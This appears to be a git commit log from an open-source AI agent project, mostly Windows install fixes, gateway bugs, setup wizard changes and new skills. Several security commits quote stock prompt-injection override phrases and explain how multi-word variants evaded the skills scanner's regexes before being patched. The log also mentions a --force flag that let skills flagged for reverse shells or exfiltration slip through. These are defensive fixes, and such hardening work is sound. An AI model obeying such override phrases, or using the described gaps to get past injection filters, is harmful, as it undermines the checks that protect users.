- Fix _resolve_to_parent return type to str (never returns None in practice)
- Trim verbose docstrings on internal helpers to single-line style
- Correct docstring that claimed 'unknown' on failure (returns str(ts))
2026-03-04 21:25:54 -08:00
teknium1
ae3deff8d4 Merge PR #261: improve error handling and type hints in session_search_tool
Authored by aydnOktay. Adds TimeoutError handling for session summarization,
better exception specificity in _format_timestamp, defensive try/except in
_resolve_to_parent, and type hints.
2026-03-04 21:23:56 -08:00
teknium1
41adca4e77 fix: strip internal fields from API messages in _handle_max_iterations
The flush_memories() and run_conversation() code paths already stripped
finish_reason and reasoning from API messages (added in 7a0b377 via PR
#253), but _handle_max_iterations() was missed. It was sending raw
messages.copy() which could include finish_reason, causing 422 errors
on strict APIs like Mistral when the agent hit max iterations.

Now strips the same internal fields consistently across all three API
call sites.
2026-03-04 21:08:20 -08:00
teknium1
8e901b31c1 Merge PR #214: fix: align _apply_delete comment with actual behavior
Authored by VolodymyrBg.
2026-03-04 20:47:47 -08:00
teknium1
11a5a64729 feat: add emojicombos.com as primary ASCII art search source
emojicombos.com has a huge curated collection of ASCII art, dot art,
kaomoji, and emoji combos searchable via web_extract with a simple
URL pattern: https://emojicombos.com/{term}-ascii-art

No API key needed. Returns modern/meme art, pop culture references,
and kaomoji alongside classic ASCII art. Added as Source A (recommended
first) before asciiart.eu (Source B, classic archive).

Also added GitHub Octocat API as a fun easter egg and kaomoji search
to the decision flow.
2026-03-04 20:23:36 -08:00
teknium1
0dba3027c1 feat: expand ascii-art skill with cowsay, boxes, toilet, image-to-ascii
Adds 5 additional tools from the awesome-ascii-art ecosystem:
- cowsay: 50+ characters with speech/thought bubbles
- boxes: 70+ decorative border designs, composable with pyfiglet
- toilet: colored text art with rainbow/metal/border filters
- ascii-image-converter: modern image-to-ASCII (PNG/JPEG/GIF/WEBP)
- jp2a: lightweight JPEG-to-ASCII fallback

Also adds fun extras (Star Wars telnet), resource links, and
an expanded decision flow covering all 7 modes.

Ref: github.com/moul/awesome-ascii-art
2026-03-04 20:16:38 -08:00
teknium1
405c7e08be feat: enhance ascii-art skill with pyfiglet and asciiart.eu search
Adds two primary modes on top of the original LLM-generation approach:
- Mode 1: pyfiglet (571 fonts, pip install, no API key) for text banners
- Mode 2: asciiart.eu search (11,000+ pieces) via web_extract for pre-made art
- Mode 3: LLM-generated art using Unicode palette (original PR, now fallback)

Includes decision flow, font recommendations, and category reference.
2026-03-04 20:01:08 -08:00
teknium1
cb36930f1d Merge PR #209: add ascii-art skill for creative text banners and art
Authored by 0xbyt4.

Initial skill with Unicode character palette and style guide for
LLM-generated ASCII art.
2026-03-04 19:59:13 -08:00
teknium1
90e6fa2612 Merge PR #204: fix Telegram italic regex newline bug
Authored by 0xbyt4.

The italic regex [^*]+ matched across newlines, corrupting bullet lists
using * markers (e.g. '* Item one\n* Item two' became italic garbage).
Fixed by adding \n to the negated character class: [^*\n]+.
2026-03-04 19:52:03 -08:00
teknium1
fd22ae5fcb Merge PR #203: add unit tests for trajectory_compressor
Authored by 0xbyt4.

25 tests covering CompressionConfig, TrajectoryMetrics, AggregateMetrics,
protected indices, content extraction, and token counting.
2026-03-04 19:48:19 -08:00
teknium1
e1baab90f7 Merge PR #201: fix skills hub dedup to prefer higher trust levels
Authored by 0xbyt4.

The dedup logic in GitHubSource.search() and unified_search() used
'r.trust_level == "trusted"' which let trusted results overwrite builtin
ones. Now uses ranked comparison: builtin (2) > trusted (1) > community (0).
2026-03-04 19:40:41 -08:00
teknium1
4fcfa329ba Merge PR #200: fix extract_images and truncate_message bugs in platform base
Authored by 0xbyt4.

Two fixes:
- extract_images(): only remove extracted image tags, not all markdown image
  tags. Previously ![doc](report.pdf) was silently dropped when real images
  were also present.
- truncate_message(): walk chunk_body not full_chunk when tracking code block
  state, so the reopened fence prefix doesn't toggle in_code off and leave
  continuation chunks with unclosed code blocks.
2026-03-04 19:37:58 -08:00
teknium1
b336980229 Merge PR #193: add unit tests for 5 security/logic-critical modules (batch 4)
Authored by 0xbyt4.

144 new tests covering gateway/pairing.py, tools/skill_manager_tool.py,
tools/skills_tool.py, honcho_integration/session.py, and
agent/auxiliary_client.py.
2026-03-04 19:35:01 -08:00
teknium1
7128f95621 Merge PR #390: fix hidden directory filter broken on Windows
Authored by Farukest. Fixes #389.

Replaces hardcoded forward-slash string checks ('/.git/', '/.hub/') with
Path.parts membership test in _find_all_skills() and scan_skill_commands().
On Windows, str(Path) uses backslashes so the old filter never matched,
causing quarantined skills to appear as installed.
2026-03-04 19:22:43 -08:00
teknium1
ffc6d767ec Merge PR #388: fix --force bypassing dangerous verdict in should_allow_install
Authored by Farukest. Fixes #387.

Removes 'and not force' from the dangerous verdict check so --force
can never install skills with critical security findings (reverse shells,
data exfiltration, etc). The docstring already documented this behavior
but the code didn't enforce it.
2026-03-04 19:19:57 -08:00
teknium1
44a2d0c01f Merge PR #386: fix symlink boundary check prefix confusion in skills_guard
Authored by Farukest. Fixes #385.

Replaces startswith() with Path.is_relative_to() in _check_structure()
symlink escape check — same fix pattern as skill_view() (PR #352).
Prevents symlinks escaping to sibling directories with shared name prefixes.
2026-03-04 19:13:21 -08:00
teknium1
3e2ed18ad0 fix: fallback to main model endpoint when auxiliary summary client fails
When the auxiliary client (used for context compression summaries) fails
— e.g. due to a stale OpenRouter API key after switching to a local LLM
— fall back to the user's active endpoint (OPENAI_BASE_URL) instead of
returning a useless static summary string.

This handles the common scenario where a user switches providers via
'hermes model' but the old provider's API key remains in .env. The
auxiliary client picks up the stale key, fails (402/auth error), and
previously compression would produce garbage. Now it gracefully retries
with the working endpoint.

On successful fallback, the working client is cached for future
compressions in the same session so the fallback cost is paid only once.

Ref: #348
2026-03-04 17:58:09 -08:00
teknium1
db58cfb13d Merge PR #269: Fix nous refresh token rotation failure on key mint failure
Fixes a bug where the refresh token was not persisted when the API key
mint failed (e.g., 402 insufficient credits, timeout). The rotated
refresh token was lost, causing subsequent auth attempts to fail with
a stale token.

Changes:
- Persist auth state immediately after each successful token refresh,
  before attempting the mint
- Use latest in-memory refresh token on mint-retry paths (was using
  the stale original)
- Atomic durable writes for auth.json (temp file + fsync + replace)
- Opt-in OAuth trace logging (HERMES_OAUTH_TRACE=1, fingerprint-only)
- 3 regression tests covering refresh+402, refresh+timeout, and
  invalid-token retry behavior

Author: Robin Fernandes <rewbs>
2026-03-04 17:52:10 -08:00
teknium1
3220bb8aaa Merge PR #403: Fix context overrun crash with local LLM backends
Authored by ch3ronsa. Fixes #348.

Adds 'context size' (LM Studio) and 'context window' (Ollama) to
context-length error detection phrases so local backend 400 errors
trigger compression instead of aborting. Also removes 'error code: 400'
from the non-retryable error list as defense in depth.
2026-03-04 17:48:44 -08:00
teknium1
ff3a479156 fix: coerce session_id and data to string in process tool handler
Some models send session_id as an integer instead of a string, causing
type errors downstream. Defensively cast session_id and write/submit
data args to str to handle non-compliant model outputs.
2026-03-04 16:37:00 -08:00
teknium1
6f4941616d fix(gateway): include history_offset in error return path
The error return (no final_response) was missing history_offset,
falling back to len(history) which has the same session_meta offset
bug fixed in PR #395. Now both return paths include the correct
filtered history length.
2026-03-04 16:26:53 -08:00
teknium1
bd3025d669 Merge PR #395: fix(gateway): use filtered history length for transcript message extraction
Authored by PercyDikec. Fixes #394.

The transcript extraction used len(history) to find new messages, but
history includes session_meta entries stripped before reaching the agent.
This caused 1 message lost per turn from turn 2 onwards. Fix returns
history_offset (filtered length) from _run_agent and uses it for the slice.
2026-03-04 16:25:09 -08:00
teknium1
4c72329412 feat: add backend validation for required binaries in setup wizard
Implemented checks to ensure that necessary binaries (Docker, Singularity, SSH) are installed for the selected backend in the setup wizard. If a required binary is missing, the user is prompted to proceed with a fallback to the local backend. This enhances user experience by preventing potential runtime errors due to missing dependencies.
2026-03-04 14:49:23 -08:00
teknium1
8311e8984b fix: preflight context compression + error handler ordering for model switches
Two fixes for the case where a user switches to a model with a smaller
context window while having a large existing session:

1. Preflight compression in run_conversation(): Before the main loop,
   estimate tokens of loaded history + system prompt. If it exceeds the
   model's compression threshold (85% of context), compress proactively
   with up to 3 passes. This naturally handles model switches because
   the gateway creates a fresh AIAgent per message with the current
   model's context length.

2. Error handler reordering: Context-length errors (400 with 'maximum
   context length' etc.) are now checked BEFORE the generic 4xx handler.
   Previously, OpenRouter's 400-status context-length errors were caught
   as non-retryable client errors and aborted immediately, never reaching
   the compression+retry logic.

Reported by Sonicrida on Discord: 840-message session (2MB+) crashed
after switching from a large-context model to minimax via OpenRouter.
2026-03-04 14:42:41 -08:00
teknium1
093acd72dd fix: catch exceptions from check_fn in is_toolset_available()
get_definitions() already wrapped check_fn() calls in try/except,
but is_toolset_available() did not. A failing check (network error,
missing import, bad config) would propagate uncaught and crash the
CLI banner, agent startup, and tools-info display.

Now is_toolset_available() catches all exceptions and returns False,
matching the existing pattern in get_definitions().

Added 4 tests covering exception handling in is_toolset_available(),
check_toolset_requirements(), get_definitions(), and
check_tool_availability().

Closes #402
2026-03-04 14:22:30 -08:00
Vicaversa
e9ab711b66 Fix context overrun crash with local LLM backends (fixes #348)
Local backends (LM Studio, Ollama, llama.cpp) return HTTP 400
with messages like "Context size has been exceeded" when the
context window is full. The error phrase list did not include
"context size" or "context window", so these errors fell through
to the generic 4xx abort handler instead of triggering compression.

Changes:
- Move context-length check above generic 4xx handler so it runs
  first (same pattern as the existing 413 check)
- Add "context size" and "context window" to the phrase list
- Guard 4xx handler with `not is_context_length_error` to prevent
  context-related 400s from being treated as non-retryable
2026-03-05 01:12:34 +03:00
teknium1
b2a9f6beaa feat: enable up/down arrow history navigation in CLI
The TextArea uses multiline=True, so up/down arrows only moved the
cursor within text — history browsing via FileHistory was attached
but inaccessible.

Two fixes:
1. Add up/down key bindings in normal input mode that call
   Buffer.auto_up()/auto_down(). These intelligently handle both:
   cursor movement when editing multi-line text, and history
   browsing when on the first/last line.

2. Pass append_to_history=True to buffer.reset() in the Enter
   handler so messages actually get saved to ~/.hermes_history.

History persists across sessions via FileHistory. The bindings are
filtered out during clarify, approval, and sudo prompts (which
have their own up/down handlers).
2026-03-04 13:39:48 -08:00
PercyDikec
d3504f84af fix(gateway): use filtered history length for transcript message extraction
The transcript extraction used len(history) to find new messages, but
history includes session_meta entries that are stripped before passing
to the agent. This mismatch caused 1 message to be lost from the
transcript on every turn after the first, because the slice offset
was too high. Use the filtered history length (history_offset) returned
by _run_agent instead.

Also changed the else branch from returning all agent_messages to
returning an empty list, so compressed/shorter agent output does not
duplicate the entire history into the transcript.
2026-03-04 21:34:40 +03:00
Farukest
34badeb19c fix(whatsapp): initialize data variable and close log handle on error paths 2026-03-04 19:11:48 +03:00
Farukest
f93b48226c fix: use Path.parts for hidden directory filter in skill listing
The hidden directory filter used hardcoded forward-slash strings like
'/.git/' and '/.hub/' to exclude internal directories. On Windows,
Path returns backslash-separated strings, so the filter never matched.

This caused quarantined skills in .hub/quarantine/ to appear as
installed skills and available slash commands on Windows.

Replaced string-based checks with Path.parts membership test which
works on both Windows and Unix.
2026-03-04 18:34:16 +03:00
Farukest
4805be0119 fix: prevent --force from overriding dangerous verdict in should_allow_install
The docstring states --force should never override dangerous verdicts,
but the condition `if result.verdict == "dangerous" and not force`
allowed force=True to skip the early return. Execution then fell
through to `if force: return True`, bypassing the policy block.

Removed `and not force` so dangerous skills are always blocked
regardless of the --force flag.
2026-03-04 18:10:18 +03:00
Farukest
a3ca71fe26 fix: use is_relative_to() for symlink boundary check in skills_guard
The symlink escape check in _check_structure() used startswith()
without a trailing separator. A symlink resolving to a sibling
directory with a shared prefix (e.g. 'axolotl-backdoor') would pass
the check for 'axolotl' since the string prefix matched.

Replaced with Path.is_relative_to() which correctly handles directory
boundaries and is consistent with the skill_view path check.
2026-03-04 17:23:23 +03:00
teknium1
70a0a5ff4a fix: exclude current session from session_search results
session_search was returning the current session if it matched the
query, which is redundant — the agent already has the current
conversation context. This wasted an LLM summarization call and a
result slot.

Added current_session_id parameter to session_search(). The agent
passes self.session_id and the search filters out any results where
either the raw or parent-resolved session ID matches. Both the raw
match and the parent-resolved match are checked to handle child
sessions from delegation.

Two tests added verifying the exclusion works and that other
sessions are still returned.
2026-03-04 06:06:40 -08:00
teknium1
021f62cb0c fix(security): patch multi-word bypass in 8 more injection patterns
Systematic audit of all prompt injection regexes in skills_guard.py
found 8 more patterns with the same single-word gap vulnerability
fixed in PR #192. Multi-word variants like 'pretend that you are',
'output the full system prompt', 'respond without your safety
filters', etc. all bypassed the scanner.

Fixed patterns:
- you are [now] → you are [... now]
- do not [tell] the user → do not [... tell ... the] user
- pretend [you are|to be] → pretend [... you are|to be]
- output the [system|initial] prompt → output [... system|initial] prompt
- act as if you [have no] [restrictions] → act as if [... you ... have no ... restrictions]
- respond without [restrictions] → respond without [... restrictions]
- you have been [updated] to → you have been [... updated] to
- share [the] [entire] [conversation] → share [... conversation]

All use (?:\w+\s+)* to allow arbitrary intermediate words.
2026-03-04 06:00:41 -08:00
teknium1
ba214e43c8 fix(security): apply same multi-word bypass fix to disregard pattern
The 'disregard ... instructions/rules/guidelines' regex had the
same single-word gap vulnerability as the 'ignore' pattern fixed
in PR #192. 'disregard all your instructions' bypassed the scanner.

Added (?:\w+\s+)* between both keyword groups to allow arbitrary
intermediate words.
2026-03-04 05:55:38 -08:00
teknium1
520a26c48f Merge PR #192: fix(security): catch multi-word prompt injection bypass in skills_guard
Authored by 0xbyt4.

The 'ignore ... instructions' regex only matched a single word between
'ignore' and the keyword (previous/all/above/prior). Multi-word variants
like 'ignore all prior instructions' bypassed the scanner entirely.
2026-03-04 05:54:04 -08:00
teknium1
a787a0d60b Merge PR #317: fix(setup): improve shell config detection for PATH setup
Authored by mehmetkr-31. Related to #202.

Checks $SHELL env var first to pick the right config file (.zshrc
vs .bashrc) instead of relying on file existence, which could pick
the wrong file on macOS. Falls back to file-existence checks for
non-standard shells. Creates the config file with touch if it was
selected but doesn't exist yet.
2026-03-04 05:46:24 -08:00
teknium1
8d2d8cc728 refactor: add exception handling and docstring to has_any_sessions
Wrap session_count() in try/except so a DB error falls through to
the heuristic fallback instead of crashing. Added a detailed
docstring explaining why the DB approach is needed and the > 1
assumption (current session already exists when called).
2026-03-04 05:38:54 -08:00
teknium1
4ae61b0886 Merge PR #370: fix(session): use database session count for has_any_sessions
Authored by Bartok9. Fixes #351.
2026-03-04 05:37:15 -08:00
teknium1
79871c2083 refactor: use Path.is_relative_to() for skill_view boundary check
Replace the string-based startswith + os.sep approach with
Path.is_relative_to() (Python 3.9+, we require 3.10+). This is
the idiomatic pathlib way to check path containment — it handles
separators, case sensitivity, and the equal-path case natively
without string manipulation.

Simplified tests to match: removed the now-unnecessary
test_separator_is_os_native test since is_relative_to doesn't
depend on separator choice.
2026-03-04 05:30:43 -08:00
teknium1
7796ac1411 Merge PR #354: fix: use os.sep in skill_view path boundary check for Windows compatibility
Authored by Farukest. Fixes #353.
2026-03-04 05:17:36 -08:00
teknium1
c45aeb45b1 fix(whatsapp): wait for connected status and log bridge output
The gateway health check broke out of the polling loop as soon as
the bridge HTTP server returned 200, regardless of the actual
WhatsApp connection status. This meant 'Bridge ready (status:
disconnected)' was printed and the gateway moved on, even when
WhatsApp never connected.

Additionally, bridge stdout/stderr were piped to DEVNULL, so if the
session had expired and the bridge needed a QR re-scan, the user had
no way to see that. The 'Scan QR code if prompted (check bridge
output)' message was misleading since there was no output to check.

Changes:
- Health check now has two phases: wait for HTTP (15s), then wait
  for status:connected (15s more). Total 30s budget.
- Bridge output routes to ~/.hermes/whatsapp/bridge.log instead of
  DEVNULL — QR codes, errors, reconnection msgs are preserved.
- Clear warnings with actionable steps if connection fails after 30s
  (check bridge.log, re-pair with hermes whatsapp).
- Removed misleading 'Scan QR code' message.
- Log file handle properly cleaned up on disconnect.

Fixes #365
2026-03-04 04:58:28 -08:00
teknium1
ee7fde6531 feat: add OpenThoughts-TBLite evaluation script
Introduced a new evaluation script for the OpenThoughts-TBLite environment, enabling users to run evaluations with customizable options. The script includes logging capabilities and real-time output, enhancing the evaluation process for terminal agents. This addition complements the existing benchmarking tools and improves usability for users.
2026-03-04 12:55:56 +00:00
teknium1
0ea6c34325 feat: add OpenThoughts-TBLite evaluation environment and configuration files
Introduced a new evaluation environment for OpenThoughts-TBLite, including the main evaluation script, configuration YAML, and README documentation. This environment provides a faster alternative to Terminal-Bench 2.0, featuring 100 difficulty-calibrated tasks for terminal agents. The setup allows for easy evaluation and configuration, enhancing the benchmarking capabilities for terminal agents.
2026-03-04 11:42:41 +00:00
teknium1
3db3d60368 refactor: extract build_session_key() as single source of truth
The session key construction logic was duplicated in 4 places
(session.py + 3 inline copies in run.py), which is exactly the
kind of drift that caused issue #349 in the first place.

Extracted build_session_key() as a public function in session.py.
SessionStore._generate_session_key() now delegates to it, and all
inline key construction in run.py has been replaced with calls to
the shared function. Tests updated to test the function directly.
2026-03-04 03:34:45 -08:00
teknium1
bfd08d5648 Merge PR #350: fix(gateway): match _quick_key to _generate_session_key for WhatsApp DMs
Authored by Farukest. Fixes #349.
2026-03-04 03:31:13 -08:00
teknium1
7f9777a0b0 feat: add container resource configuration prompts in setup wizard
Introduced interactive prompts for configuring container resource settings (CPU, memory, disk, persistence) during the setup wizard. Updated the default configuration to include these settings and improved user guidance on their implications for Docker, Singularity, and Modal backends. This enhancement aims to streamline the setup process and provide users with clearer options for resource management.
2026-03-04 03:29:05 -08:00
Bartok Moltbot
87a16ad2e5 fix(session): use database session count for has_any_sessions (#351)
The previous implementation used `len(self._entries) > 1` to check if any
sessions had ever been created. This failed for single-platform users because
when sessions reset (via /reset, auto-reset, or gateway restart), the entry
for the same session_key is replaced in _entries, not added. So len(_entries)
stays at 1 for users who only use one platform.

Fix: Query the SQLite database's session count instead. The database preserves
historical session records (marked as ended), so session_count() correctly
returns > 1 for returning users even after resets.

This prevents the agent from reintroducing itself to returning users after
every session reset.

Fixes #351
2026-03-04 03:34:57 -05:00
Vicaversa
f90a627f9a fix(gateway): add missing UTF-8 encoding to file I/O preventing crashes on Windows
On Windows, Python's open() defaults to the system locale encoding
(e.g. cp1254 for Turkish, cp1252 for Western European) instead of
UTF-8. The gateway already uses ensure_ascii=False in json.dumps()
to preserve Unicode characters in chat messages, but the
corresponding open() calls lack encoding="utf-8". This mismatch
causes UnicodeEncodeError / UnicodeDecodeError when users send
non-ASCII messages (Turkish, Japanese, Arabic, emoji, etc.) through
Telegram, Discord, WhatsApp, or Slack on Windows.

The project already fixed this for .env files in hermes_cli/config.py
(line 624) but the gateway module was missed.

Files fixed:
- gateway/session.py: session index + JSONL transcript read/write (5 calls)
- gateway/channel_directory.py: channel directory read/write (3 calls)
- gateway/mirror.py: session index read + transcript append (2 calls)
2026-03-04 11:32:57 +03:00
teknium1
152e0800e6 feat: add detailed setup instructions for Telegram, Discord, and Slack platforms
Enhanced the gateway setup process by including step-by-step setup instructions for Telegram, Discord, and Slack. Updated help prompts for environment variables to reference these new instructions, improving user guidance during the configuration of messaging platforms. This change aims to streamline the onboarding experience for users setting up their bots.
2026-03-03 20:05:15 -08:00
teknium1
d8f10fa515 feat: implement allowlist feature for user access in gateway setup
Enhanced the gateway setup process by introducing an allowlist feature for user IDs, improving security by denying access by default. Updated prompts to guide users in configuring allowed users for Telegram, Discord, and Slack platforms, and refined messaging for handling unauthorized users. This change aims to enhance user experience and security during the setup process.
2026-03-03 19:55:06 -08:00
Farukest
e86f391cac fix: use os.sep in skill_view path boundary check for Windows compatibility 2026-03-04 06:50:06 +03:00
Farukest
e39de2e752 fix(gateway): match _quick_key to _generate_session_key for WhatsApp DMs 2026-03-04 06:34:46 +03:00
teknium1
1538be45de fix: improve gateway setup messaging for non-interactive environments
Updated the gateway setup function to provide clearer messaging when no terminal is available, enhancing user understanding of the installation process. This change ensures that users are informed to run 'hermes gateway install' later if the setup is skipped due to terminal unavailability.
2026-03-03 19:34:05 -08:00
teknium1
95e3f4b001 refactor: enhance gateway service setup messaging and installation prompts
Updated the setup wizard to improve clarity around gateway service installation and management. Added prompts for users to install and start the gateway as a system service on Linux and macOS, while refining messaging for home channel configuration. This enhances the overall user experience during the setup process.
2026-03-03 19:31:16 -08:00
teknium1
b7821b6dc1 enhance: improve gateway setup messaging and service installation prompts
Updated the gateway setup function to provide clearer messaging regarding the installation status of the gateway service. Added prompts for installing the service as a background process on supported platforms (Linux and macOS) and clarified next steps for users. Improved user experience by offering options to start the service immediately or run it in the foreground.
2026-03-03 19:30:05 -08:00
teknium1
556a132f2d refactor: update platform status function to return plain-text strings
Modified the _platform_status function in gateway.py to return uncolored plain-text status strings for platforms, ensuring compatibility with simple_term_menu items. Additionally, removed emoji characters from the status display in the gateway setup menu for improved readability.
2026-03-03 19:04:32 -08:00
teknium1
fafb9c23bf fix: strip emoji characters from menu choices in interactive setup
Updated the interactive setup in hermes CLI to remove emoji characters from menu choices. This change addresses visual issues caused by emoji miscalculations during terminal redraws, ensuring a cleaner and more readable interface for users.
2026-03-03 19:02:33 -08:00
teknium1
1754bdf1e8 docs: update AGENTS.md, README.md, and messaging.md to include interactive setup for messaging platforms
Enhanced documentation to reflect the new interactive setup command for configuring messaging platforms (Telegram, Discord, Slack, WhatsApp). Updated sections in AGENTS.md, README.md, and messaging.md to provide clear instructions on using the 'hermes gateway setup' command, improving user experience and accessibility for platform configuration.
2026-03-03 19:00:09 -08:00
teknium1
fa3d7b3d03 feat: add interactive setup for messaging platforms in gateway CLI
Enhanced the hermes CLI gateway with a new 'setup' command to configure messaging platforms (Telegram, Discord, Slack, WhatsApp). This includes prompts for necessary environment variables and improved user experience for platform configuration. Updated documentation to reflect the new command.
2026-03-03 18:57:33 -08:00
teknium1
73f2998d48 fix: update setup wizard logic to handle terminal availability
Modified the setup wizard to ensure it only skips execution when no terminal is available, improving compatibility with piped installations. Additionally, updated environment variable checks to use bool() for accurate provider configuration detection, addressing potential issues with empty values in .env files.
2026-03-03 18:40:30 -08:00
teyrebaz33
6a51fd23df feat: add AgentMail skill for agent-owned email inboxes (#329) 2026-03-03 22:20:35 +03:00
teknium1
ffec21236d feat: enhance Home Assistant integration with service discovery and setup
Improvements to the HA integration merged from PR #184:

- Add ha_list_services tool: discovers available services (actions) per
  domain with descriptions and parameter fields. Tells the model what
  it can do with each device type (e.g. light.turn_on accepts brightness,
  color_name, transition). Closes the gap where the model had to guess
  available actions.

- Add HA to hermes tools config: users can enable/disable the homeassistant
  toolset and configure HASS_TOKEN + HASS_URL through 'hermes tools' setup
  flow instead of manually editing .env.

- Fix should-fix items from code review:
  - Remove sys.path.insert hack from gateway adapter
  - Replace all print() calls with proper logger (info/warning/error)
  - Move env var reads from import-time to handler-time via _get_config()
  - Add dedicated REST session reuse in gateway send()

- Update ha_call_service description to reference ha_list_services for
  action discovery.

- Update tests for new ha_list_services tool in toolset resolution.
2026-03-03 05:16:53 -08:00
teknium1
db0521ce0e Merge PR #184: feat: Home Assistant integration (REST tools + WebSocket gateway)
Authored by 0xbyt4. Adds smart home control via REST tools (ha_list_entities,
ha_get_state, ha_call_service) with domain blocklist and entity_id validation,
plus WebSocket gateway adapter for real-time event monitoring.

Also includes Gemini 3 thought_signature preservation fix (extra_content on
tool calls) needed for multi-turn tool calling via OpenRouter.
2026-03-03 05:01:39 -08:00
areu01or00
a1c25046a9 fix(timezone): add timezone-aware clock across agent, cron, and execute_code 2026-03-03 18:23:40 +05:30
teknium1
de0af4df66 refactor: enhance software-development skills with Hermes integration
Improvements to all 5 skills adapted from obra/superpowers:

- Restored anti-rationalization tables and red flags from originals
  (key behavioral guardrails that prevent LLMs from taking shortcuts)
- Restored 'Rule of Three' for debugging (3+ failed fixes = question
  architecture, not keep fixing)
- Restored Pattern Analysis and Hypothesis Testing phases in debugging
- Restored 'Why Order Matters' rebuttals and verification checklist in TDD
- Added proper Hermes delegate_task integration with real parameter examples
  and toolset specifications throughout
- Added Hermes tool usage (search_files, read_file, terminal) for
  investigation and verification steps
- Removed references to non-existent skills (brainstorming,
  finishing-a-development-branch, executing-plans, using-git-worktrees)
- Removed generic language-specific sections (Go, Rust, Jest) that
  added bulk without agent value
- Tightened prose — cut ~430 lines while adding more actionable content
- Added execution handoff section to writing-plans
- Consistent cross-references between the 5 skills
2026-03-03 04:08:56 -08:00
teknium1
0e1723ef74 Merge PR #137: feat: Add Superpowers software development skills
Authored by kaos35. Adds 5 software development workflow skills adapted
from obra/superpowers: test-driven-development, systematic-debugging,
subagent-driven-development, writing-plans, requesting-code-review.
2026-03-03 04:00:00 -08:00
0xbyt4
aefc330b8f merge: resolve conflict with main (add mcp + homeassistant extras) 2026-03-03 14:52:22 +03:00
0xbyt4
f967471758 merge: resolve conflict with main (keep fence markers + _find_shell) 2026-03-03 14:50:45 +03:00
teknium1
4f5ffb8909 fix: NoneType not iterable error when summarizing at max iterations
In _handle_max_iterations, the codex_responses path set tools=None to
prevent tool calls during summarization. However, the OpenAI SDK's
_make_tools() treats None as a valid value (not its Omit sentinel) and
tries to iterate over it, causing TypeError: 'NoneType' object is not
iterable.

Fix: use codex_kwargs.pop('tools', None) to remove the key entirely,
so the SDK never receives it and uses its default omit behavior.

Fixes #300
2026-03-03 03:42:44 -08:00
mehmetkr-31
54909b0282 fix(setup): improve shell config detection for PATH setup 2026-03-03 14:39:46 +03:00
teknium1
f084538cb9 Move vision items to GitHub issues (#314, #315)
Voice Mode → #314
Dogfood Skill → #315

The VISION.md doc is removed in favor of detailed, trackable GitHub
issues. Issues are assignable, discussable, and linkable to PRs.
2026-03-03 01:26:05 -08:00
teknium1
535b46f813 feat: ZIP-based update fallback for Windows
On Windows systems where git can't write files (antivirus, NTFS filter
drivers), 'hermes update' now falls back to downloading a ZIP archive
from GitHub and extracting it over the existing installation.

The fallback triggers in two cases:
1. No .git directory (ZIP-installed via install.ps1 fallback)
2. Git pull fails with CalledProcessError on Windows

The ZIP update preserves venv/, node_modules/, .git/, and .env,
reinstalls Python deps via uv, and syncs bundled skills.

Also adds -c windows.appendAtomically=false to all git commands in
the update path for systems where git works but atomic writes fail.
2026-03-02 23:00:22 -08:00
teknium1
4766b3cdb9 fix: fall back to ZIP download when git clone fails on Windows
Git for Windows can completely fail to write files during clone due to
antivirus software, Windows Defender Controlled Folder Access, or NTFS
filter drivers. Even with windows.appendAtomically=false, the checkout
phase fails with 'unable to create file: Invalid argument'.

New install strategy (3 attempts):
1. git clone with -c windows.appendAtomically=false (SSH then HTTPS)
2. If clone fails: download GitHub ZIP archive, extract with
   Expand-Archive (Windows native, no git file I/O), then git init
   the result for future updates
3. All git commands now use -c flag to inject the atomic write fix

Also passes -c flag on update path (fetch/checkout/pull) and makes
submodule init failure non-fatal with a warning.
2026-03-02 22:53:28 -08:00
teknium1
354af6ccee chore: remove unnecessary migration code from install.ps1
No existing Windows installations to migrate from.
2026-03-02 22:51:36 -08:00
teknium1
c9afbbac0b feat: install to %LOCALAPPDATA%\hermes on Windows
Move Windows install location from ~\.hermes (user profile root) to
%LOCALAPPDATA%\hermes (C:\Users\<user>\AppData\Local\hermes).

The user profile directory is prone to issues from OneDrive sync,
Windows Defender Controlled Folder Access, and NTFS filter drivers
that break git's atomic file operations. %LOCALAPPDATA% is the
standard Windows location for per-user app data (used by VS Code,
Discord, etc.) and avoids these issues.

Changes:
- Default HermesHome to $env:LOCALAPPDATA\hermes
- Set HERMES_HOME user env var so Python code finds the new location
- Auto-migrate existing ~\.hermes installations on first run
- Update completion message to show actual paths
2026-03-02 22:49:22 -08:00
teknium1
83fa442c1b fix: use env vars for git windows.appendAtomically on Windows
The previous fix set git config --global before clone, but on systems
where atomic writes are broken (OneDrive, antivirus, NTFS filter
drivers), even writing ~/.gitconfig fails with 'Invalid argument'.

Fix: inject the config via GIT_CONFIG_COUNT/KEY/VALUE environment
variables, which git reads before performing any file I/O. This
bypasses the chicken-and-egg problem where git can't write the config
file that would fix its file-writing issue.
2026-03-02 22:47:04 -08:00
teknium1
1900e5238b fix: git clone fails on Windows with 'copy-fd: Invalid argument'
Git for Windows can fail during clone when copying hook template files
from the system templates directory. The error:

  fatal: cannot copy '.../templates/hooks/fsmonitor-watchman.sample'
         to '.git/hooks/...': Invalid argument

The script already set windows.appendAtomically=false but only AFTER
clone, which is too late since clone itself triggers the error.

Fix:
- Set git config --global windows.appendAtomically false BEFORE clone
- Add a third fallback: clone with --template='' to skip hook template
  copying entirely (they're optional .sample files)
2026-03-02 22:39:57 -08:00
teknium1
ddae1aa2e9 fix: install.ps1 exits entire PowerShell window when run via iex
When running via 'irm ... | iex', the script executes in the caller's
session scope. The 'exit 1' calls (lines 424, 460, 849-851) would kill
the entire PowerShell window instead of just stopping the script.

Fix:
- Replace all 'exit 1' with 'throw' for proper error propagation
- Wrap Main() call in try/catch so errors are caught and displayed
  with a helpful message instead of silently closing the terminal
- Show fallback instructions to download and run as a .ps1 file
  if the piped install keeps failing
2026-03-02 22:38:31 -08:00
teknium1
16274d5a82 fix: Windows git 'unable to write loose object' + venv pip path
- Set 'git config windows.appendAtomically false' in hermes update
  command (win32 only) and in install.ps1 after cloning. Fixes the
  'fatal: unable to write loose object file: Invalid argument' error
  on Windows filesystems.
- Fix venv pip fallback path: Scripts/pip on Windows vs bin/pip on Unix
- Gate .env encoding fix behind _IS_WINDOWS (no change to Linux/macOS)
2026-03-02 22:31:42 -08:00
teknium1
5749f5809c fix: explicit UTF-8 encoding for .env file operations (Windows only)
On Windows, open() without explicit encoding uses the system locale
(cp1252/etc.), which can cause OSError errno 22 'Invalid argument'
when reading/writing the UTF-8 .env file.

Fix: gate encoding kwargs behind _IS_WINDOWS check so Linux/macOS
code paths are completely unchanged. Only Windows gets explicit
encoding='utf-8' on load_env() and save_env_value().
2026-03-02 22:29:11 -08:00
BathreeNode
